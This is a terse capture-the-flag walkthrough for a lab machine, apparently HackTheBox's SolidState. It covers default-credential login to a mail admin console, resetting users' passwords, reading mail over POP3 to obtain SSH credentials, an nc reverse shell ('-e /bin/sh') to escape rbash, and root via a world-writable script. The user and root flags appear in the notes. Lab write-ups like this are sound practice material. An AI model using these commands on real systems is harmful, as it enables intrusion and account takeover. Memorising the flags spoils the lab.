IP: 10.10.10.51

Recon

nmap(fast)
nmap(big)

Possible username: webadmin@solid-state-security.com

https://gist.github.com/kjiwa/82d3bb091d45b59c1d7674727b1292a7

https://blog.mailtrap.io/how-to-test-smtp-server/

telnet 10.10.10.51 4555

root
root

listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

setpassword <username> <new pw>

https://www.123-reg.co.uk/support/servers/how-can-i-use-telnet-to-test-my-pop3-e-mail-account-is-working-on-my-dedicated-server/

telnet 10.10.10.51 110
user john
pass asdfghj

https://electrictoolbox.com/pop3-commands/

john -> top 1 1

telnet ip 110
user mindy
pass asdfghj
list
top 2 20

Got ssh creds

mindy:P@55W0rd1!2@

• log in

user.txt

914d0a4ebc177889b5b89a23f556fd75

Privesc

users(/etc/passwd):

james
mindy
root

• We are in rbash so we must exit/upgrade it to a normal shell!

Exiting rbash

https://github.com/Elinpf/OSCP-survival-guide

ssh mindy@10.10.10.51 nc 10.10.14.12 1337 -e /bin/sh

• run linpeas

/opt/tmp.py is 777

download it -> edit it locally -> upload to /dev/shm -> copy to /opt/tmp.py instead of mving cuz we dont have enough priv to write inside /opt

wait!

Got root

b4c9723a28899b1c45db281d99cc87c9